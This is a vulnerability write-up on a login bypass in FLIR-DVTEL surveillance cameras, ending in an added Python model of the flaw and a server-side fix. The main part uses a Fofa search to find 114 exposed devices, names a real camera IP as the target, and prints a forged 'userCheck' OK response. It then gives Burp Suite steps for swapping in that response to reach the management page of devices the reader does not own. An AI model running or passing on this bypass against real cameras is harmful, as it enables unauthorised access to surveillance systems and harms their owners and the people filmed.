Manufacturer's official website:

Thermal Imaging, Night Vision and Infrared Camera Systems | Teledyne FLIR

Search for this equipment asset using the Fofa Cyberspace Mapping Platform

**Rule syntax:** app="FLIR-DVTEL-视频监控"

The search returns 114 device records.

Choose any target from Fofa

url:http://194.90.217.136/doc/page/login.asp

1. Reproduction process:

POC:

```
HTTP/1.1 200 OK
Date: Thu, 08 Sep 2023 23:34:40 GMT
Server: App-webs/
Connection: close
Content-Length: 185
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<userCheck version="1.0" xmlns="urn:selfextension:psiaext-ver10-xsd">
<statusValue>200</statusValue>
<statusString>OK</statusString>
</userCheck>
```

Intercept the traffic with Burp Suite.

Then right-click the request, choose "Do intercept" > "Response to this request", and click "Forward" to send the packet on.

Once the response packet has been intercepted, replace its content with the content of the POC.

This step must be done quickly!

After the modification is complete, click the "Forward" button to send the packet on.

Once all the data packets have been forwarded, the login succeeds and the management page of the camera device opens.
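The steps above work when the login outcome is read from a response the user can rewrite. The model below is an added example, not code from the original page or from the vendor: it assumes that root cause, and the `Device` class, its method names, the sample password and the 401 rejection body are hypothetical or constructed.

```python
import secrets
import xml.etree.ElementTree as ET

NS = {"p": "urn:selfextension:psiaext-ver10-xsd"}  # namespace used in the page's POC

# Constructed sample: a rejection body (the 401 values are an assumption) and the
# same body after it has been edited in an intercepting proxy.
REJECTED = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<userCheck version="1.0" xmlns="urn:selfextension:psiaext-ver10-xsd">'
            b'<statusValue>401</statusValue><statusString>Unauthorized</statusString>'
            b'</userCheck>')
TAMPERED = REJECTED.replace(b"401", b"200").replace(b"Unauthorized", b"OK")


def client_gate(body: bytes) -> bool:
    """Browser-side check: it reads bytes the user is free to rewrite."""
    root = ET.fromstring(body)
    return root.findtext("p:statusValue", namespaces=NS) == "200"


class Device:
    """Hypothetical server model; class and method names are illustrative."""

    def __init__(self, users):
        self._users = users      # username -> password, plaintext only to keep this short
        self._sessions = set()   # tokens the server itself has issued

    def login(self, user, password):
        expected = self._users.get(user)
        if expected is None or not secrets.compare_digest(expected, password):
            return None
        token = secrets.token_urlsafe(32)
        self._sessions.add(token)
        return token

    def page_client_trusting(self, token=None):
        # Weak design: the server serves the page and relies on client_gate().
        return 200

    def page_server_enforced(self, token=None):
        # Hardened design: only a server-issued session opens the page.
        return 200 if token in self._sessions else 401


if __name__ == "__main__":
    dev = Device({"admin": "constructed-password"})
    print("client gate, original body:", client_gate(REJECTED))
    print("client gate, edited body:  ", client_gate(TAMPERED))
    print("weak page, no session:     ", dev.page_client_trusting())
    print("enforced page, no session: ", dev.page_server_enforced())
```

With the server-enforced variant, an edited `userCheck` body changes only what the browser displays; every management request still fails without a token the device issued.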